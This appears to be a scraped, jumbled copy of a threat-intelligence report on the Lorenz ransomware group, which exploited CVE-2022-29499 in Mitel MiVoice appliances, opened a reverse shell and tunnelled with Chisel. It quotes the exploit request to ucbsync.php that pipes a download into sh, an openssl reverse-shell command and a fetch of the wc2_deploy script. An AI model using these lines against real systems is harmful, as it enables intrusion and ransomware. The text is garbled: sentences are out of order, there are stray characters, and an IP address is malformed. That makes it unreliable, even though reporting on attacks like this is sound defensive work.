#ARCTIC WOLF DOWNLOAD#
Once a reverse shell was established, the threat actors made use of the Mitel device’s command line interface ( stcli) to create a hidden directory and proceeded to download a compiled binary of the open source TCP tunneling tool Chisel directly from Github via wget. Openssl s_client -quiet -connect 137.184.181252:443 > /tmp/.svc_bkp_1 Ī packet capture demonstrated that the reverse shell established on 137.184.181252:443 was a ncat SSL listener. The wc2_deploy shell script, when executed, establishes an SSL-encrypted reverse shell using living-off-the-land techniques via the mkfifo command and OpenSSL.
"GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:137.184.181252/$PWD|sh|? HTTP/1.0" 200Īfter successful exploitation, the threat actors leveraged cURL to download a shell script called wc2_deploy GET //shoretel/wc2_deploy HTTP/1.1 Although post-exploitation details were limited, Arctic Wolf Labs observed significant overlap in the reported Tactics, Techniques, and Procedures (TTPs) tied to initial access. In late-June, researchers at CrowdStrike published a blog article detailing the vulnerability and a suspected ransomware intrusion attempt leveraging it for initial access.
#ARCTIC WOLF CODE#
Lorenz exploited CVE-2022-29499, a remote code execution vulnerability impacting the Mitel Service Appliance component of MiVoice Connect, to obtain a reverse shell and subsequently used Chisel as a tunnelling tool to pivot into the environment. Initial malicious activity originated from a Mitel appliance sitting on the network perimeter. In the current landscape, many organizations heavily monitor critical assets, such as domain controllers and web servers, but tend to leave VoIP devices and IoT devices without proper monitoring, which enables threat actors to gain a foothold into an environment without being detected. Threat actors are beginning to shift targeting to lesser known or monitored assets to avoid detection. Monitoring just critical assets is not enough for organizations, security teams should monitor all externally facing devices for potential malicious activity, including VoIP and IoT devices. Over the last quarter, the group has primarily targeted small and medium businesses (SMBs) located in the United States, with outliers in China and Mexico. Lorenz is a ransomware group that has been active since at least February 2021 and like many ransomware groups, performs double-extortion by exfiltrating data before encrypting systems. The Arctic Wolf Labs team recently investigated a Lorenz ransomware intrusion, which leveraged a Mitel MiVoice VoIP appliance vulnerability ( CVE-2022-29499) for initial access and Microsoft’s BitLocker Drive Encryption for data encryption.
Lorenz waited nearly a month after obtaining initial access to conduct additional activity.Arctic Wolf Labs assesses with medium confidence that the Lorenz ransomware group exploited CVE-2022-29499 to compromise Mitel MiVoice Connect to gain initial access.
0 kommentar(er)
